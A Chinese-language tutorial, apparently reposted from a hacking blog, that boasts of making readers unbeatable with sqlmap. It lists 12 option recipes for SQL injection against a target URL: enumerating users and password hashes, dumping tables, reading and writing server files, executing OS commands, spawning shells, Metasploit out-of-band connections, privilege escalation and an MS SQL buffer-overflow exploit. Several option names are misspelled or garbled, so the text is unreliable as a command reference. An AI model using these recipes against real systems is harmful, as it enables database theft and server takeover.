相信很多都知道Sqlmap,但是却不知道如何通过sqlmap来注入对吗? 今天将实战教大家如何真正的使用sqlmap来注入?只要知道这12种方法,包你只需要使用Sqlmap这一个工具掌握这12种用法就能打遍天下无敌手;
Sqlmap注入使用方法1:-u 目标地址 -f 广泛指纹后端DBMS -b 检索DBMS横幅 --current-user 检索当前会话用户 --current-db 检索当前数据库 --users 枚举数据库用户 --passwords 枚举数据库用户密码散列 --dbs 枚举可用的数据库 -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法2:-u 目标地址 -b 检索DBMS横幅 --passwords 枚举数据库用户密码散列 -U 指定数据库用户(cu,当前用户的别名) --unlon-use 如果可能,通过联合查询sql注入检索数据 -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法3:-u 目标地址 --dump 打印表项 -T 打印表(users) -C 打印列(surname) --start 第一个项输入(2,第二个表格顶部) --stop 最后一项输入(3,第三个表格顶部) -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法4:-u 目标地址 --dump 打印表项 -C 打印列(user.pass) -v VERBOSE 详细程度级别:0-6(默认值1) --exclude-sysdbs lgnore系统数据库(e.g.information_schema)
注意:没有提供table名(-T选项)
Sqlmap注入使用方法5:-u 目标地址 --sql-shell 产生一个交互式的sql shell -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法6:-u 目标地址 --read-file 文件以从底层文件系统读取 -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法7:-u 目标地址 --write-file 文件上传到底层文件系统(/ etc / passwd) --dest-file 绝对文件系统路径写入(/ tmp / writetest) -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法8:-u 目标地址 --os-cmd 操作系统命令执行(id) -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法9:-u 目标地址 --os-shell 生成交互式命令提示符 ---union-usea 如果可能的话,通过联合查询SQL注入使用petrieve数据 -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法10:-u 目标地址 --os-pwn 建立用户和数据库服务器之间的带外连接 --msf-path metasploit文件系统路径(/home/inquis/software/metasploit) --prive-esc 尝试将数据库进程的用户权限提升到系统 -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法11:-u 目标地址 --os-pwn 建立用户和数据库服务器之间的带外连接 --msf-path metasploit文件系统路径(/home/inquis/software/metasploit) -v VERBOSE 详细程度级别:0-6(默认值1)
Sqlmap注入使用方法12:-u 目标地址 --os-bof 通过利用微软sql服务器缓冲区溢出(MS09-04)建立用户和数据库服务器之间的带外连接, --msf-path metasploit文件系统路径(/home/inquis/software/metasploit) -v VERBOSE 详细程度级别:0-6(默认值1) |
| 本文出处: https://www.fujieace.com/hacker/sqlmap-12.html |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|